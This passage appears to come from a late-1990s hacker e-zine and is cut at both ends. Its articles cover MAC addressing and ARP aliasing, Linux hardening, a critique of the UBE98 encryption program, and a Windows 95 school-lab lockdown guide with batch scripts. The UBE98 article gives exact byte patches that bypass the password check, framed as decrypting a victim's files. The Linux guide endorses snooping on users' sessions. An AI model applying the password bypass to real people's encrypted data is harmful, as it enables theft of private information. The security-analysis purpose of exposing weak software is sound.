0001 0010 0000 0000 0000 0000 0000 0001 Hex C A E D 8 4 0 0 0 0 0 8 The least significant bit or first bit octet 0 is the I/G address bit used to identify the destination address, either as an individual/unicast address (0) or as a group/multicast address (1) that identifies one, several, or all stations connected to the LAN. The all-station broadcast address is a special predefined group address off all 1's. The second bit of octet 0 is the Universally or Locally Administered (U/L) bit. This bit indicates whether the address has been assigned by a local or universal administrator. Universally administered addresses have this bit set to 0 and they are globally/universally unique. This is the normal case. If this bit is set to 1, the entire address (all 48 bits) has been locally administered and may not be globally unique. Thus, for example, bytes 0,1 and 2 would be unique for SynnerGy Networks, and SynnerGy Networks can then assign the last 24 bits for each network interface controller it manufactures, thereby allowing approximately 16 million individual addresses and 16 million unique group addresses that no other organization can have (universally unique). Converting a Unicast Address to a Multicast Address For a given 48-bit Universal LAN MAC address, the first 24 bits correspond to OUI. The least significant bit (the first bit or I/G bit) of the OUI is the only bit that can be changed to make this address a multicast address. We cannot change any other bit without either compromising uniqueness of the address or violating some IEEE addressing standards. The U/L bit for a universally unique address is always 0. This leaves the following four possibilities in the least significant nibble (4 bits) of a valid universally unique unicast/individual address: 0x0(0000) 0x4(0100) 0x8(1000) 0xC(1100) where 0x indicates a hexadecimal digit. Given the fact that we can only change one bit (the I/G bit) to convert the unicast address to a multicast address, we have the following transformations: 0x0(0000) ? 0x1(0001) 0x4(0100) ? 0x5(0101) 0x8(1000) ? 0x9(1001) 0xC(1100) ? 0xD(1101) Thus, for a given unicast address, 08:00:0b:06:1d:50, for example, the multicast form is 09:00:0b:06:1d:50. Address Resolution Protocol The IP addresses must be mapped to MAC addresses before a client can successfully send a packet to a server or peer on the network. In TCP/IP, the Address Resolution Protocol (ARP) is used to seek and map the address information. The client sends an ARP broadcast query that says, in effect, "Here is a destination IP address. Send me your MAC address." This query is seen by all the controllers on the network, and the owner of the IP address replies with its MAC address. The client stores the IP/MAC address map entry in a small table called the ARP cache. This information can be published by ARP. Aliasing the IP address - An Example Initially, the network controller is brought online and given a primary IP address using ifconfig. Now we use ipalias to create up to 16 additional network identities on the secondary IP address and will honor all communication sent to its IP Aliases. Steps to bring a virtual network interface up on a system are: 1. Add the alias IP address to the interface using the following command sequence: $ ipalias -a et5961 where (as an example) is the alias IP address and et5961 is the controller name. 2. Add the multicast address to the interface $ macconfig -m 9:6:a:b:3:e et5961 where 9:6:a:b:3:e is the example MAC address and et5961 is the controller name. 3. Invoke ARP to publish the mapping. $ arp -s 9:6:a:b:3:e pub 4. Check the mapping published by ARP, which should appear as shown on the seconds line of this example. $ arp -a ( at 9:6:a:b:3:e permanent published >From this point onward any system on the network can access this aliased IP address ( using ping, telnet, ftp, rlogin, rcp, rsh, and so forth. m0f0 --------------------------------------------------------------------------- [Yet Another Newbies Guide to Linux Security] [Digital Ebola] --------------------------------------------------------------------------- Another one bites the dust today. Young grasshopper gets burned by a mad cracker wishing to gain yet another root prompt. In this article, I will go into the "minimal/BOFH" approach to Linux system security. I will not go into great detail over services or packages. This guide is to be taken as guidelines and not exact instructions. If you are not familiar with BOFH tactics, go read some BOFH stories, they are funny as hell. Good Linux security starts from the install. Period. You should choose your distribution well, or be prepared to either be owned quickly, or learn your system quickly. Depending on your distro, you will have a choice on packages, and modules. Read on these. The very first thing you should do, is acquaint yourself with each and every package, and its particular bugs, or holes. When you build your box, you should know your exact purpose for it and build it accordingly. If you are building it strictly for firewall purposes, then there is no reason to run XFree86. If you already have a print server on your network, then theres no reason why you should install printer services. This approach not only works well, but lets the system grow as you do, and starting off small, means that when you do add extras, they will be installed properly, without risk, because you know exactly what you are installing. Minimal packages mean less maintainence. Although its nice to have everything on one system, its not good from a security aspect. As well as being minimalistic on the packages, be the same way on services. Do not elect to run services you are never going to use. Most dialup connections have no business running BIND, or POP3. Keep the services down to a minimal, as the less services you have, the less doors a intruder has to your system. If you are running a network on ISDN or multiplexed line, it would be highly advisable to divide those kinds of services to different machines. POP3 and BIND both are notorious for security holes, and just because you don't see exploit code on rootshell, does not mean exploit code does not exist. When it comes to dealing with the packages you have, it can be a tricky thing. You have set down, and set a purpose for your machine, researched the packages, and killed all unnessacary services. Whats left, are the things that are needed. How do you protect whats there? Permissions. You MUST check every SUID root binary. Some things in the distro have no business being SUID root, although the person who coded it seemed to think it was a good idea. Works for him, but could be fatal for you. To check to see what is SUID on the system do this: linux$ find / -perm -4000 -print This string will list ALL the SUID binaries on the system. You need to run each one as a USER and see what happens. A lot of them will be protected, some however, will not. You have to analyse the use of the binary, and decide whether or not the binary needs to be SUID root. Or decide whether or not your user needs to run it. This is the BOFH approach in a way. Why would a remote user need PING? They really dont, and PING itself is SUID root by default under most Linux distrobutions. Does the user need compiling functions? If, most of your users are not coding, then you should create a group for coding, and put only trusted people in it. This is very much BOFH. This also eliminates "script kiddies" or makes their life tougher, and protects certain linked libs. Tailor the box, for the general kind of users on the system. Countermeasures improve security. One such package is Abacus Sentry. This binary listens on TCP/UDP ports, and tries to detect port scans. Upon port scans, it will put the offending host on deny and attempt to cut its route. This is very evil, very effective and will make /etc/hosts.deny grow to huge proportions. There is a flaw with it. A enterprising person, could fake the scan to make it look like it came from your router, thus denying yourself, and cutting your route. Enough said. Sometimes there is a price for good security, again, as I have said before, you have to build for your needs. Another countermeasure tool, is Tripwire. Tripwire will watch certain files for modifications, such as /root/.bash_profile or whatever else you may configure it for. Upon modification, it will mail root. Watching the network your system on is vital if you are in a LAN enviroment. Bins such as Sniffit, Netwatch and even good ole Netstat are important if you are to maintain security, both on the inside and out. Of course, in this article, we are only hitting the basics of Linux security, but think about this. All the security in the world is no good, if the people you are connected to are not secure themselves. Do not be afraid to not only question yourself, your users, but your provider as well. You must watch your subnet, manage your users, and keep everything in working order. Your provider should do the same. Although, its debatable whether they can legally snoop your sessions, you, the newbie with the linux box, can. Do not be afraid to cat .bash_history, or grep logs. Or even ttysnoop for that matter. If you have a questionable user, you need to know what is going on. As a rule, users never give straight answers, it would be the same as if you were questioned by your provider. For the newbie, learning can be frustrating and time consuming. Whether you are learning for yourself, or your business, nobody likes to be owned. In this day and age, information can not only make you prosper, but what you don't know can kill you. Or in this case, your systems. Do not be afraid to experiment with new tactics or new ideas. Do not choke your users, you CAN be too secure. It all comes down to your needs and the needs of your users. Use common sense, and read everything. And then, you too, may be wise in the ways of Linux security. :) Digital Ebola aka DigiEbola http://wintermute.unixgeeks.com digi@wintermute.unixgeeks.com --------------------------------------------------------------------------- [UBE98 -- Unbreakable Encryption] [Joe Peschel] --------------------------------------------------------------------------- UBE98 is an encryption program by CIPHERTech at: CIPHERTech The site is in England so the chap who designed the program isn't encumbered by the United States' EAR (Export Administration Regulations). Introduction The UBE98 author describes the program: 255 Byte RC4 Algorithm - The strongest encryption algorithm in the world! Automatic Encryption - Self extracting Encrypted file creation - QuickView encrypted pictures - Win98 style caption bars and menus - Seamless windows 95/98/NT integration - Transparent use - UBE 98 has to be the choice for you. Download it now for free! There was also a review in the British press entitled "The 30 billion year encryption problem" at: BBC Article You might notice that the BBC refers to a 2,048-bit key while the author says the key is 2,040 bits. The time needed to brute-force such a key, of course, is wrong, too. There are other errors in the report, too, that I'll let you enjoy (or cringe at) at your leisure. UBE98's problems are bigger than just a reporting error over the real size of the key, and the time it would take to brute-force the key. The British government likely isn't worried about having to crack UBE98 if it needs to. In this paper, I'll describe three ways to break UBE98. The Known-Plaintext Attack I was first reminded of UBE98 in sci.crypt when I saw a mention of the program's file wiping capability. Later, I noticed Mike Stay commenting in coderpunks on UBE98's encryption capability. Some experts responded to the initial mention of UBE98's large RC4 key as quite possible, and asked why they thought the original poster considered the program snake-oil. I am sure had those experts looked at the program they would have determined quickly the worthlessness of UBE98 as an encryption program. Stay soon described his attack in coderpunks: I downloaded the thing. It asks for a bunch of information (like e-mail address, name, address, 25 random keystrokes). I wrote Peter about how he created the key and he says it's MD5 and SHA plus some "random bytes from various places in the computer." The key is stored somewhere and protected with a password. It's always the same key. I encrypted a file of zeros and another file, XORed the two and got the original. A known plaintext attack will break every file you ever encrypt with this (because it only generates one key, ever.) I might add that you can also save the key (255 bytes) to a floppy disk, which in itself may pose a security risk. Also, even though the created key is always the same on each installation, the key is different on different systems. I mentioned Stay's analysis in sci.crypt hoping to steer folks away from a poor encryption product. In response a fellow called Melih suggested that a cracker could find other ways to attack UBE98. So I set about finding a couple more attacks on this dubious symmetric cipher. Cracking a Dubious Symmetric Cipher By Disassembling the Program UBE98 does typical symmetric encryption and lets you create self-extracting encrypted executables. In order to access the content of either encryption you need to enter a password. Since, as Stay pointed out, the key is always the same, I theorized the program's check of the correct password might be subverted in a way less conventional than typical cryptanalytic attacks. Let's consider a typical encryption first. We'll assume that we have access to the victim's machine. We are going to try Stay's attack on UBE98, but we'll bring with us a few of floppy disks for copying *.ube files. One of our disks will be home to a file (500k or so) of 00s of known-plaintext and a hex editor such as HIEW. First, we'll copy all of the encrypted .ube files to floppy disk. Next, we'll need to encrypt our known-plaintext (the 00 file) with the victim's key. We'll assume that he hasn't left the password in memory, even though UBE98 has that capability. So we'll need to bypass the password. Naturally, we have figured out a way to bypass it. A file called hook32.exe is the program's executable. Upon previously disassembling the .exe we found an interesting JE instruction in the code prior to the error message string: "You have entered an incorrect password." :0044A026 7458 je 0044A080 In our hex editor, we change the JE instruction to JNE by changing 74 to 75 at offset 00049426h and run UBE98 with our slightly modified executable. The result: UBE98 accepts an incorrect password or no password at all and decrypts any encrypted file. Armed with that knowledge, we attack the victim's UBE98 installation and either hex edit the UBE98 executable or run a patch to change the instruction. Now we can either XOR at our leisure on our own system, or decrypt while at the victim's system. Cracking Self-Extracting Encrypted Files Self-extracting encrypted files are intended to provide a way to send encrypted email. It's not a bad idea, but normally you still need to find a way to securely transmit the key. Finding a secure way to transmit the key, unfortunately, in UBE98's case makes little difference since a self-extracting encrypted file can be cracked in the same way as hook32.exe. We can assume either we have access to the sender's machine or that we have the capability of intercepting the sender's and recipient's email. In either case, we are in possession of encryptedfile.exe. We guess that the password is likely checked as it is in hook32.exe and look for a JE instruction in the disassembly. In the disassembly, we find the string "You have not entered the password with which this file was encrypted. Please try again." We find this instruction prior to the error message string: :0042D13E 0F84A0000000 je 0042D1E4 In our hex editor we change JE to JNE (84 to 85). When we execute the self-extracting encrypted file we find that, like hook32.exe, an incorrect password or no password at all decrypts the file. UBE98 is even worse than I thought. --------------------------------------------------------------------------- [Windows 95 Protection] [NtWak0] --------------------------------------------------------------------------- GREATS TO U ALL MY BROTHERS/SISTERS FROM "NtWaK0" To me a hacker isn't just someone doing "illegal" things like cracking other people's passwords or breaking into some computer to steal information's. I think a hacker is everybody interested in experimenting with computers or the telephone network. Quote:--------------------------------------------------------------------- "Any Grandma can call herself a hacker when she's able to program her VCR" --------------------------------------------------------------------------- This document is for educational use only and it is very helpful for schoolteacher n student....I am not going to show you how to hack a windows Box but how to protect it and when you know How to protect your self and other that mean you can have fun with that box too? --:) When you start using a school computer and whatever the purpose of the usage the PC configuration is constantly modified by the student or teacher. That will lead to a lot of security holes and system misconfiguration It is necessary " to lock " the computers, so that the pupils cannot change the configurations nor to destroy files but to only work with applications planned for them. Only the supervisor can modify this configuration or install new software. The supervisor is not inevitably a single individual, but can be represented by two or three Qualified people. If it is the case, these people will have systematically to act in concert for the least modification. The supervisor must always be with the listening of the other teachers and take account of their remarks and proposals. >From now on, with the Windows 95 launching, this dialogue box appears : The supervisor can type his name: sup and its password. This word must known by a minimum of people and never be typed in front of a pupil who could recognize the keys typed on the keyboard (although it appears in the form *******). In the same way, this word should not form part of the vocabulary of our pupils, because they could extremely well find it while grouping. Its length will be of at least 5 letters. Fault of knowing the password, the children click on cancel or press on the key [ Esc ]. If they would type an unspecified name and a password of their invention (one can trust them, they will not deprive oneself any) the computer will accept them, but they will be found in any event with the same configuration as the others and as they will not be able to modify this configuration by default. How to carry out the protection of a computer ? How Does Windows Use System Policies? When the user logs on, Windows checks the user's configuration information for the location of the policy file. Windows then downloads the policies and copies the information in the registry using the following process. First if user profiles are enabled Windows checks for a user policy section that matches the user name and applies the user specific policy. If Windows does not find a user policy section, it applies the Default User policies. If support for group policies is installed, Windows downloads group policies, starting with the lowest priority group and ending with the highest priority group. Group policies are processed for all groups to which the user belongs. Group policies are not applied if there are user policies defined for the user. These settings are copied into the USER.DAT portion of the registry. Second Windows applies computer specific policies to the desktop environment. If a policy section for that computer name does not exist Windows applies the Default Computer policies. These settings are copied into the SYSTEM.DAT portion of the registry. By default Windows automatically attempts to download computer and user policies from the file Config.pol in the Netlogon folder on a Windows NT server or the Public folder on a NetWare server. This default location can be overridden in a policy file setting. If no server is present Windows uses the settings currently on the client computer. The System Policy Editor? When you run System Policy Editor Windows 95 opens the default policy template, which contains existing policies that you can enable or modify. A template is a listing of the possible policies that an administrator can set. The Office Resource Kit Tools and Utilities CD-ROM include the latest version of the System Policy Editor.This is the same version that is included with Windows NT Workstation 4.0 and you can use it with both Windows 95 and Windows NT Workstation 4.0. Using the System Policy Editor, you can set user policies for all users, for a particular network group, or for a single user. User policies are system policies that represent application options relevant to the user currently logged on to Windows and they are stored in the HKEY_USERS portion of the user's Windows registry Activation of the system of the passwords: To launch Windows 95. Click on Start>Parameters>Control panel>Passwords. In: " User profiles ", check the following options: CHECK User can customize their preferences blah blah blah CHECK Include desktop Icons and Network blah blah blah CHECK Include start menu and program blah blah blah Click Ok, and agree to start again the computer With the exit of the Windows 95 restarting, you will see a dialogue asking you your name And your password will appear.When the dialogue box requiring name and password appears again, press on the key [Esc].By doing this, we will launches the configuration by default, which will become the configuration for the pupils. At this point all what you have to do is to delete the shortcut and the unwanted application from the start menu, and from the desktop. Next step is to use poledit and change all the options that you want restrict. --------------------------------------------------------------------------- Caution!!! Poledit will modify the Base of register per default (C:\Windows\User.dat). It is an operation, which can be dangerous if we don't know what we are doing. It is thus advisable to back up the User.dat file on diskette before starting --------------------------------------------------------------------------- At the end of the modification, click on Ok, then in the menu File, click on close. Lastly answer Yes when a dialogue box proposes to the modification. Certain options will take effect only after having started again the computer. Therefore click on: Start>then Stop To start again the computer (remove the diskette temporarily). Let us say we have a new user SO-AND-SO 1 The file C:\Windows\SO-AND-SO.pwl keep the user password. 2 The folder profil C:\Windows\Profiles\SO-AND-SO This file contains the personal registry User.dat of SO-AND-SO 3 The default registry setting C:\Windows\User.dat can be found in the section: Hkey_Local_Machine\Software\Microsoft\Windows\Current_Version\ Profile_List \ Thus, if we wants to remove the superfluous profiles, while preserving the profile sup, it is necessary to do : 1 Erase all the C:\Windows\*.pwl files except for Sup.pwl 2 Empty the C:\Windows\Profiles file and all its under-files except for the sup, which by the same occasion will be recopied in C:\Windows\Sup 3 Recopy the reference registry (*) : User.stu + System.stu In User.dat + System.dat (The old registry will be saved as User.bak + System.bak). All these operations can be automated, by carrying out the command in the file Nettoie.bat The register of C:\Windows\User.stu reference + System.stu will be created by carrying out the command in the file Sauve.bat, which is made automatically at the time of the installation Thereafter, it will be necessary to carry out Sauve.bat only after possible modification of the configuration (by default). Important: Before starting the modification use the batch file nettoie.bat to clean you your system --------------------------------------------------------------------------- NETTOIE.BAT The role of this file is to remove all the profiles automatically, except one: that of the supervisor (sup). It will have to be carried out rather often and regularly In particular, always carry out before modifying the registry. Here the source of NETTOIE.BAT (attention!!! this command file must be launched starting from Windows 95, either in a Dos session, or directly starting from the Browser. Indeed, if one launches it in exclusive Dos mode, the long names will not be managed correctly). --------------------------------------------------------------------------- @echo off cls echo NETTOIE.BAT - NtWaK0 1/6/99 set os=windows if exist c:\%os%\sup.pwl goto suite1 echo The supervisor profile (sup) was not created yet. You cannot carry out nettoie.bat echo at the moment goto fin :suite1 echo List of actual profiles (*.pwl) : echo. dir c:\%os%\*.pwl /b /p echo. echo If you see several profiles, only SUP.PWL must be preserved choice /N You want delete the other profiles (Y or N) ? if errorlevel 2 goto fin echo. attrib +r c:\%os%\sup.pwl del c:\%os%\*.pwl > nul attrib -r c:\%os%\sup.pwl cls echo Erasing the superfluous profiles... echo. if exist c:\%os%\profiles\sup\*.* goto suite2 echo No file of supervisory profile (sup) is detected!!! goto fin :suite2 if exist c:\%os%\sup\*.* deltree /y c:\%os%\sup\*.* > nul attrib -s -h -r c:\%os%\profiles\sup\*.* xcopy32 c:\%os%\profiles\sup\*.* c:\%os%\sup\ /s /e > nul deltree /y c:\%os%\profiles\*.* > nul xcopy32 c:\%os%\sup\*.* c:\%os%\profiles\sup\ /s /e > nul attrib +r +h +s c:\%os%\profiles\sup\*.* if exist c:\%os%\user.stu goto suite3 echo The student registry (reference ) (User.stu) echo Was not detected!!! goto fin :suite3 attrib -s -h -r c:\%os%\user.dat attrib -s -h -r c:\%os%\user.stu if exist c:\%os%\user.bak del c:\%os%\user.bak rename c:\%os%\user.dat user.bak copy c:\%os%\user.stu c:\%os%\user.dat > nul attrib +r +h +s c:\%os%\user.dat attrib +r +h +s c:\%os%\user.stu attrib -s -h -r c:\%os%\system.dat attrib -s -h -r c:\%os%\system.stu if exist c:\%os%\system.bak del c:\%os%\system.bak rename c:\%os%\system.dat system.bak copy c:\%os%\system.stu c:\%os%\system.dat > nul attrib +r +h +s c:\%os%\system.dat attrib +r +h +s c:\%os%\system.stu echo All the different profiles other then SUP were deleted echo. echo Now, you must start again Windows... :fin set os= echo. ---------------------------------------------------------------------------- ---------------------------------------------------------------------------- SAUVE.BAT This command file must be carried out after any modification of the configuration raises (then the default configuration). Be certain that no different profile than sup exists before launching sauve.bat (if not, the Base of register of User.stu reference would keep trace of the undesirable profiles). Do not forget to carry out nettoie.bat before modifying the default configuration, in order to eliminate the different profiles other then sup ---------------------------------------------------------------------------- @echo off cls echo SAUVE.BAT - - NtWaK0 1/6/99 echo. set os=windows if exist c:\%os%\sup.pwl goto suite1 echo The supervisor profile (sup) was not created yet. You cannot carry out sauve.bat echo at the moment goto fin :suite1 if not exist c:\%os%\user.stu goto nouveau if not exist c:\%os%\system.stu goto nouveau echo Sauvegarde de USER.stu + SYSTEM.stu goto suite2 :nouveau echo First use. Creation of USER.stu + SYSTEM.stu :suite2 echo. attrib -s -h -r c:\%os%\user.dat if exist c:\%os%\user.stu attrib -s -h -r c:\%os%\user.stu copy c:\%os%\user.dat c:\%os%\user.stu > nul attrib +r +h +s c:\%os%\user.dat attrib +r +h +s c:\%os%\user.stu attrib -s -h -r c:\%os%\system.dat if exist c:\%os%\system.stu attrib -s -h -r c:\%os%\system.stu copy c:\%os%\system.dat c:\%os%\system.stu > nul attrib +r +h +s c:\%os%\system.dat attrib +r +h +s c:\%os%\system.stu echo End. :fin set os= echo. --------------------------------------------------------------------------- The Browser coded The source program of the Browser coded realized in Qbasic (Explore.bas), then is compiled (Explore.exe) and is recopied in C:\Windows\System. A short cut towards Explore.exe will be slipped into the Menu To start by default, after all the restrictions were applied by Poledit (not to cancel the option: to carry out programs MSDOS). The password file (Explore.psw) is a simple textual file which contains the password in clear text (better is to not use Edit in a DOS session...) it is also; located in C:\Windows\System. Here the source of Explore.exe: --------------------------------------------------------------------------- ' EXPLORE.EXE - NtWaK0 - 1/6/99 ' CLS OPEN "I", #1, "c:\windows\system\explore.psw" INPUT #1, code$ CLOSE #1 lcode = LEN(code$) COLOR 14: PRINT : PRINT " If you don't know what to do, type *" PRINT c$ = "": t$ = "": cpt = 0 DO t$ = INKEY$: IF t$ <> "" THEN c$ = c$ + t$: cpt = cpt + 1 IF cpt > 30 THEN COLOR 12: PRINT " Searching for Code ???" BEEP: BEEP: BEEP FOR i = 1 TO 500000: NEXT i END END IF IF t$ = "*" THEN BEEP: END IF LEN(c$) > lcode THEN c$ = RIGHT$(c$, lcode) LOOP UNTIL c$ = code$ COLOR 10: PRINT " Explorer..." FOR i = 1 TO 100000: NEXT i SHELL "c:\windows\explorer.exe" END --------------------------------------------------------------------------- PHOTO.BAT This command file makes it possible " to photograph " the complete configuration of a computer after we entirely protected it (creation of the supervisory profile, clean-up in the Start Menu restrictions on the configuration by default, etc.) When we carries out A:\photo.bat, the configuration of the computer is entirely recopied on this same diskette in a file A:\Windows (approximately 200 to 600 KB). Thereafter, we will recopy this configuration on another computer, while launching Windows 95 then by carrying out A:\duplique.bat starting from the Browser. With the restarting, the second computer will be configured like the first. We will be able to then carry out duplique.bat, on all the computers, which we wants to protect --------------------------------------------------------------------------- Caution! A:\photo.bat and A:\duplique.bat should not be carried out in exclusive mode MSDOS. They must be launched starting from Windows (use the Browser) and remain on the diskette --------------------------------------------------------------------------- --------------------------------------------------------------------------- @echo off cls echo PHOTO.BAT - NtWaK0 - 1/6/99 echo. pause > nul set os=windows if exist c:\%os%\sup.pwl goto suite1 echo The supervisor profile (sup) was not created yet. You cannot carry out sauve.bat echo at the moment goto fin :suite1 if not exist a:\%os%\*.* goto suite2 echo Photo.bat was already excuted ! now you should use Duplique.bat goto fin :suite2 echo Please wait copying the files... echo. xcopy32 "c:\%os%\start menu\*.*" "a:\%os%\start menu\" /s /e > nul deltree /y "c:\%os%\profiles\sup\recent\*.*" > nul attrib -s -h -r c:\%os%\profiles\sup\user.dat xcopy32 "c:\%os%\profiles\*.*" "a:\%os%\profiles\" /s /e > nul attrib +r +h +s c:\%os%\profiles\sup\user.dat attrib -s -h -r c:\%os%\user.dat copy c:\%os%\user.dat a:\%os% > nul attrib +r +h +s c:\%os%\user.dat attrib -s -h -r c:\%os%\system.dat copy c:\%os%\system.dat a:\%os% > nul attrib +r +h +s c:\%os%\system.dat copy c:\%os%\sup.pwl a:\%os% > nul echo End. :fin set os= echo. --------------------------------------------------------------------------------- DUPLIQUE.BAT It is not possible to launch A:\duplique.bat without executing first A:\photo.bat --------------------------------------------------------------------------------- @echo off cls echo DUPLIQUE.BAT - NtWaK0 - 1/6/99 echo. pause > nul set os=windows if not exist c:\%os%\sup.pwl goto suite1 echo This PC is already protected ! goto fin :suite1 if exist a:\%os%\*.* goto suite2 echo You should first execute Photo.bat on a protected PC ! goto fin :suite2 echo In the event of problem, the old Start Menu is recopied in the file echo Ex_Start_Menu registry User.dat + System.dat is renamed echo to User.bak + System.bak echo. echo Copying files... echo. if not exist "c:\%os%\Ex_Start_Menu\*.*" goto premier deltree /y "c:\%os%\Ex_Start_Menu\*.*" > nul echo New installation. echo. :premier xcopy32 "c:\%os%\start menu\*.*" "c:\%os%\Ex_Start_Menu\" /s /e > nul deltree /y "c:\%os%\start menu\*.*" > nul xcopy32 "a:\%os%\start menu\*.*" "c:\%os%\Start menu\" /s /e /v > nul xcopy32 "a:\%os%\profiles\*.*" "c:\%os%\Profiles\" /s /e /v > nul attrib -s -h -r c:\%os%\user.dat if exist c:\%os%\user.bak del c:\%os%\user.bak rename c:\%os%\user.dat User.bak copy a:\%os%\User.dat c:\%os% > nul copy c:\%os%\user.dat c:\%os%\User.stu > nul attrib +r +h +s c:\%os%\user.dat attrib +r +h +s c:\%os%\user.stu attrib -s -h -r c:\%os%\system.dat if exist c:\%os%\system.bak del c:\%os%\system.bak rename c:\%os%\system.dat system.bak copy a:\%os%\System.dat c:\%os% > nul copy c:\%os%\system.dat c:\%os%\System.stu > nul attrib +r +h +s c:\%os%\system.dat attrib +r +h +s c:\%os%\system.stu copy a:\%os%\Sup.pwl c:\%os% > nul copy a:\Nettoie.bat c:\%os% > nul copy a:\Sauve.bat c:\%os% > nul copy a:\Explore.exe c:\%os%\system > nul copy a:\Explore.psw c:\%os%\system > nul if exist c:\%os%\poledit.exe del c:\%os%\poledit.exe echo End. Now you should restart your computer. :fin set os= echo. --------------------------------------------------------------------------- Registry Keys CLASS MACHINE CATEGORY !!Network KEYNAME Software\Microsoft\Windows\CurrentVersion\Policies\Network CATEGORY !!AccessControl POLICY !!AccessControl_User KEYNAME System\CurrentControlSet\Services\VxD\FILESEC VALUENAME Start VALUEON NUMERIC 0 VALUEOFF DELETE ACTIONLISTON KEYNAME System\CurrentControlSet\Services\VxD\FILESEC VALUENAME StaticVxD VALUE filesec.vxd END ACTIONLISTON ACTIONLISTOFF KEYNAME Security\Provider VALUENAME Platform_Type VALUE NUMERIC 0 KEYNAME System\CurrentControlSet\Services\VxD\FILESEC VALUENAME StaticVxD VALUE DELETE KEYNAME System\CurrentControlSet\Services\VxD\NWSP VALUENAME Start VALUE DELETE VALUENAME StaticVxD VALUE DELETE KEYNAME System\CurrentControlSet\Services\VxD\MSSP VALUENAME Start VALUE DELETE VALUENAME StaticVxD VALUE DELETE END ACTIONLISTOFF PART !!AuthenticatorName EDITTEXT KEYNAME Security\Provider VALUENAME Container END PART PART !!AuthenticatorType DROPDOWNLIST KEYNAME Security\Provider VALUENAME Platform_Type REQUIRED ITEMLIST NAME !!AT_NetWare VALUE NUMERIC 3 ACTIONLIST KEYNAME System\CurrentControlSet\Services\VxD\NWSP VALUENAME StaticVxD VALUE nwsp.vxd VALUENAME Start VALUE NUMERIC 0 KEYNAME Security\Provider VALUENAME Address_Book VALUE nwab32.dll END ACTIONLIST NAME !!AT_NTAS VALUE NUMERIC 2 ACTIONLIST KEYNAME System\CurrentControlSet\Services\VxD\MSSP VALUENAME StaticVxD VALUE mssp.vxd VALUENAME Start VALUE NUMERIC 0 KEYNAME Security\Provider VALUENAME Address_Book VALUE msab32.dll END ACTIONLIST NAME !!AT_NT VALUE NUMERIC 1 ACTIONLIST KEYNAME System\CurrentControlSet\Services\VxD\MSSP VALUENAME StaticVxD VALUE mssp.vxd VALUENAME Start VALUE NUMERIC 0 KEYNAME Security\Provider VALUENAME Address_Book VALUE msab32.dll END ACTIONLIST END ITEMLIST END PART END POLICY END CATEGORY ; User-Level Security CATEGORY !!Logon POLICY !!LogonBanner KEYNAME Software\Microsoft\Windows\CurrentVersion\Winlogon PART !!LogonBanner_Caption EDITTEXT VALUENAME "LegalNoticeCaption" MAXLEN 255 DEFAULT !!LogonBanner_DefCaption END PART PART !!LogonBanner_Text EDITTEXT VALUENAME "LegalNoticeText" MAXLEN 255 DEFAULT !!LogonBanner_DefText END PART END POLICY POLICY !!ValidatedLogon KEYNAME Network\Logon VALUENAME "MustBeValidated" END POLICY END CATEGORY CATEGORY !!NWClient KEYNAME System\CurrentControlSet\Services\VxD\NWREDIR POLICY !!PrefServer KEYNAME System\CurrentControlSet\Services\NWNP32\NetworkProvider PART !!PrefServerName EDITTEXT REQUIRED VALUENAME "AuthenticatingAgent" MAXLEN 48 END PART END POLICY POLICY !!SupportLFN PART !!SupportLFNsOn DROPDOWNLIST REQUIRED VALUENAME "SupportLFN" ITEMLIST NAME !!LFN_No311 VALUE NUMERIC 1 NAME !!LFN_All VALUE NUMERIC 2 END ITEMLIST END PART END POLICY POLICY !!SearchMode PART !!SearchMode1 NUMERIC VALUENAME SearchMode MIN 0 MAX 7 DEFAULT 0 END PART END POLICY POLICY !!DisableAutoNWLogin KEYNAME System\CurrentControlSet\Services\NWNP32\NetworkProvider VALUENAME DisableDefaultPasswords END POLICY END CATEGORY ; Microsoft Netware-Compatible Network CATEGORY !!MSClient POLICY !!LogonDomain KEYNAME Network\Logon VALUENAME "LMLogon" PART !!DomainName EDITTEXT REQUIRED MAXLEN 15 KEYNAME System\CurrentControlSet\Services\MSNP32\NetworkProvider VALUENAME AuthenticatingAgent END PART PART !!DomainLogonConfirmation CHECKBOX KEYNAME Network\Logon VALUENAME DomainLogonMessage END PART PART !!NoDomainPwdCaching CHECKBOX KEYNAME Network\Logon VALUENAME NoDomainPwdCaching END PART END POLICY POLICY !!Workgroup KEYNAME System\CurrentControlSet\Services\VxD\VNETSUP PART !!WorkgroupName EDITTEXT REQUIRED VALUENAME "Workgroup" MAXLEN 15 END PART END POLICY POLICY !!AlternateWorkgroup KEYNAME System\CurrentControlSet\Services\VxD\VREDIR PART !!WorkgroupName EDITTEXT REQUIRED VALUENAME "Workgroup" MAXLEN 15 END PART END POLICY END CATEGORY ; Microsoft Network CATEGORY !!NWServer POLICY !!DisableSAP KEYNAME System\CurrentControlSet\Services\NcpServer\Parameters VALUENAME Use_Sap VALUEON "0" VALUEOFF "1" ACTIONLISTON KEYNAME System\CurrentControlSet\Services\NcpServer\Parameters\Ndi\Params\Use_Sap VALUENAME "" VALUE "0" END ACTIONLISTON ACTIONLISTOFF KEYNAME System\CurrentControlSet\Services\NcpServer\Parameters\Ndi\Params\Use_Sap VALUENAME "" VALUE "1" END ACTIONLISTOFF END POLICY END CATEGORY CATEGORY !!Passwords POLICY !!HideSharePasswords VALUENAME "HideSharePwds" END POLICY POLICY !!DisablePasswordCaching VALUENAME "DisablePwdCaching" END POLICY POLICY !!RequireAlphaNum VALUENAME "AlphanumPwds" END POLICY POLICY !!MinimumPwdLen PART !!MPL_Length NUMERIC REQUIRED MIN 1 MAX 8 DEFAULT 3 VALUENAME MinPwdLen END PART END POLICY END CATEGORY ; Passwords CATEGORY !!RemoteAccess POLICY !!RemoteAccess_Disable VALUENAME "NoDialIn" END POLICY END CATEGORY ; Remote Access CATEGORY !!Sharing POLICY !!DisableFileSharing VALUENAME "NoFileSharing" END POLICY POLICY !!DisablePrintSharing VALUENAME "NoPrintSharing" END POLICY END CATEGORY ; Sharing CATEGORY !!SNMP POLICY !!Communities KEYNAME System\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities PART !!CommunitiesListbox LISTBOX VALUEPREFIX "" END PART END POLICY POLICY !!PermittedManagers KEYNAME System\CurrentControlSet\Services\SNMP\Parameters\PermittedManagers PART !!PermittedManagersListbox LISTBOX VALUEPREFIX "" END PART END POLICY POLICY !!Traps_Public KEYNAME System\CurrentControlSet\Services\SNMP\Parameters\TrapConfiguration\Public PART !!Traps_PublicListbox LISTBOX VALUEPREFIX "" END PART END POLICY POLICY !!InternetMIB KEYNAME System\CurrentControlSet\Services\SNMP\Parameters\RFC1156Agent PART !!ContactName EDITTEXT REQUIRED VALUENAME sysContact END PART PART !!Location EDITTEXT 